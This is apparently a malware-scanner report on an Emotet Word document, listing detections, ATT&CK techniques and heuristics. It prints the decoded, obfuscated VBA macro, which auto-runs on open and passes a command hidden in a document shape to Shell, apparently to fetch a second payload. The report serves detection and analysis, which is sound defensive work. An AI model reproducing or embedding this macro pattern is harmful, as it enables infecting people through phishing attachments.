MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for Emotet. The macro attempts to execute cmd.exe with specific flags, likely to download and run a secondary payload. Heuristics indicate suspicious cmd.exe and PowerShell invocations, and the ClamAV signature directly identifies it as Emotet.
Heuristics 10
-
ClamAV: Doc.Malware.Emotet-6780750-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emotet-6780750-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(ahtsWlu, oErzu), DQHvS) qRoplTGMvSauGKk = (281985326 + Round(LlQwmzsABvEvnjsRIpIMhhA) * 303676712 - EBrttnGLGLniLDU + (okXCRHmicwVciLdlVnhwBGHI / Tan(jhVEjzlnPszcrrzOIRvRdjuh))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() kcwfdQtdG -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4770 bytes |
SHA-256: b5cbb18e474603b6a793a20da4b511b8545b45c6332c7a0cca50a32c9f2e5f6a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
135 of 167 identifiers look randomly generated (e.g. 'iWXimYKsVbwtMWSsPcAntrhb') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FwqGFJCXLnvaw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() kcwfdQtdG End Sub Attribute VB_Name = "RjiTbsXAELWEws" Function kcwfdQtdG() On Error Resume Next nEWpCGwEiaNkaQFFG = (135348292 + Round(dduEdfpllphQlzd) * 288551995 - OdPflwpDhwJpsmhAOCn + (zsKNUNOzJbkwYirdFdrjEBv / Tan(jwtDzQWzpwaVTBKYirtG))) MQNvDvlLHowzihXT = 74351202 EVQkiiBhstdvdEuIC = (10607366 + Round(ZWmJXSwXiFdlPXTc) * 146336823 - GRVWcQXOqjqHUB + (OiwSMtRlLTbPHNXJb / Tan(HvknCtVmIcNhblbUBsX))) JHpjKDBBPBSZOjMF = 211406568 cYfimvAhSstuEHzcjtcwXFM = (161802719 + Round(jRRcSPulGChilsKXBfU) * 28529444 - ZnfDGdzOWXLHIGdjF + (dwIwFStwBRaVZs / Tan(HGdmZLlzXjfWbcljow))) rFJaiMKHcfnBwTnBzzwf = 265944892 YbWkTzUucclNoPCYo = (237480001 + Round(EsKoOACtczYthSwDWYQn) * 340761385 - NsDsKpQihGKotYNnHkQ + (swEiDupLfAXwhci / Tan(kWpNduPRisZZpjQjW))) jRoUoQzEChjNHQtvDlvDbwj = 254588541 ccrJIVpBlUjMGlKXtEUPPUwA = (290493155 + Round(LHkzHmtJEIpMzppNG) * 158207103 - jtfflGMtHjIjqRtKiQ + (NtTzhBijGiZCNYhLVjbzqu / Tan(lZvbwvEfHzRKZNwwdDZFPhh))) IJFYiGRzSBhXlZjlCwSEwNI = 334674153 YUAYPbzVjfNaTI = (267267861 + Round(OpWiCdRtYimQdGuRTrbjaja) * 220489337 - YInfjIhTUwDQVzvDHzho + (sdlwGbjIRiOpFdVdOpaF / Tan(IHrAwsjcSjtswjiCichAKDQo))) PVZZsKGiijWtwIiAfwB = 139149390 sTJzOKdQlLvflPtbrLOvwLMK = (295673666 + Round(XfsAbMwXdXidYJQpiNE) * 68399795 - zuUtXlqAjGwGpmwYl + (jjOlWsOnEfIczGiJakXGD / Tan(IXwQkXjXRRzdViBLYcf))) hKrEHsXfMNAifIYqpGIqE = 218497700 zdKbDdijKAQQwmPREdi = (35918465 + Round(vnhGuSXzWWNXMcmJlhsWYWL) * 303765220 - iCXVrrhthBqdVILGkndDtlJd + (TwliWZcnJQPAiff / Tan(dfbvjQYjPojhqDsttNYu))) KKcOqLsvGGIzXPGihcCYFShp = 304396927 Const oErzu = 0 kiXqfOElufjOSbW = (196162268 + Round(XQouXBacXUnCJzO) * 49484517 - DioUQKPBjVVXYkJASVGXNNdw + (IuRjkiVGVYoplHGZ / Tan(nfEEzkdBrcHjkpErGIQzSzn))) QCMULhNAwUazrJ = 56827757 jaitmrsdqJbfkUfv = (103838534 + Round(SGZJXZZpUWHYUwbE) * 81720172 - wbDtwqjQrYUTWTiuFM + (WCFUzWWWSpcEjIJzoHYIic / Tan(hBVBzouatPQpTrG))) WcUObOTnLNUpmjD = 33952290 QrAWJaMXYwwsvamnsAjTVjff = (88088830 + Round(LPlwfzZTDzfdnY) * 82640009 - jUbEFiRZWafcchLVI + (PwlcSwTbXpHPNHH / Tan(ALDIzjwLZFUwrWl))) UjJQdGBiliGbRHMY = 142375401 Set htFNXlij = FwqGFJCXLnvaw.Shapes(AwzGK + "DjJESGjQHruO" + FhntQdlN) XrhGvJJPUPZHEEtWZfrGMaq = (55596192 + Round(zrYkGLQjtKTjolkOOnk) * 154233098 - RYJqBIcaiwAZjvS + (iODJXLtanltHswmFlViTP / Tan(ECnJLOSJIpSdjZhNhGijDQP))) ijJvoLNwUkJAWOzfHd = 188570856 hnfnwkUQUOETzzmw = (337212041 + Round(DcpAzKBoYuBzsZsivpjaUnKs) * 128230493 - mYCLjEzEDzUhpU + (JMZOXViaQDzRYbPRzjvYcm / Tan(KzznWtNOzMoKbldw))) IzlImmZcniWAuwJXAOQX = 225044322 fbVFQzrjUVpERzc = (255979721 + Round(HHAEZrJUFtTojiX) * 283464442 - IkKODwfkDPTkbWkQi + (TkCFjLkKDXsnmSNzr / Tan(ctDIVUWbpkdXjXCREHODAzd))) uHsPdBWbfsolNKOiiIVAjjo = 133278977 ahtsWlu = htFNXlij.TextFrame.TextRange + ozEjR + TkPPfAD + aLjKq + QimbW + zAQiTp + LwCDPiji + FiNJGMRP + qFzXYWMa + jidlzk uijNKuNcUwvnslwpVYjS = (198375547 + Round(ocjqkjwbwURVCPERuYECU) * 195052605 - tkIUsHpPjwKpGi + (JidtzaVWiilEiKNbPL / Tan(pFcOGTJFiXsazmZOaZa))) bXOalHDLEVXvijoOhPXa = 278712664 iWXimYKsVbwtMWSsPcAntrhb = (123486578 + Round(fcqrifpzibnCZdqvkJRqQwTO) * 300846607 - UTEqovMmthCiwSD + (oqEMDXzwHYKciiIbz / Tan(LWtrnrqmjIsGMwmBIdJ))) CwVGjQljEKZajYHjVwDN = 149121756 jBSAOruNTjKRXiPDofzQi = (272631043 + Round(SBQwTVdwJVWtKEnAhiEk) * 143646475 - RFVVnznwaGuXAw + (uasqmBwBkFwAfQhaEINkKbwh / Tan(IKvPwmDpCmHMuiCUEkPp))) IisjpOmNmTcKMiqBlmSvLddZ = 96267190 RThrPclwdWitcOblKHJiDFt = (279226137 + Round(aLpQqvOXAZuQmHEiEl) * 157871620 - zANNvZJdPoLZrVp + (whmaTVcphVYAFDzUV / Tan(WZwbURmlILNUZQRniWzzl))) XXfaBJYLorDGzPSUMUoi = 90045891 jGQjOFnbXVkAOGVGkEUmZS = (218849524 + Round(KoqJJmzZwWsquCua) * 89983217 - jDIWVmmJRoLwOOZ + (ZaPdSkYKErOfMi / Tan(uYTldEnSDWzVIOzI))) QrcUKkovfwSiYHziiQYv = 188061778 NwHiRUd = Array(YzsCawt, dNwWWR, RBUOKi, Interaction _ _ _ _ _ _ _ _ .Shell(ahtsWlu, oErzu), DQHvS) qRoplTGMvSauGKk = (281985326 + Round(LlQwmzsABvEvnjsRIpIMhhA) * 303676712 - EBrttnGLGLniLDU + (okXCRHmicwVciLdlVnhwBGHI / Tan(jhVEjzlnPszcrrzOIRvRdjuh))) MXWYuhcPEhaRdt = 5179489 bUZtIKvrlOjOQRIilK = (243825202 + Round(ozdXURFnBfiTDCT) * 87454953 - YSrzqqXImbwQGtdsR + (drBZrFHpGfPLOwuONstLw / Tan(FPhpGXvmEblUpVN))) bmqAjrsbNAWrflzGjWmmrBwk = 302747499 tJksfNLiSNtDjJ = (98205526 + Round(iFJSisUQbRUOdhoH) * 91563381 - JwUSUYzjVOwoqnSmi + (NiZAoTROtzBlZmpRzSsQk / Tan(TwXGUnahvrCDufsJIAAGf))) fjpJwZnAtOAdPb = 194025532 End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.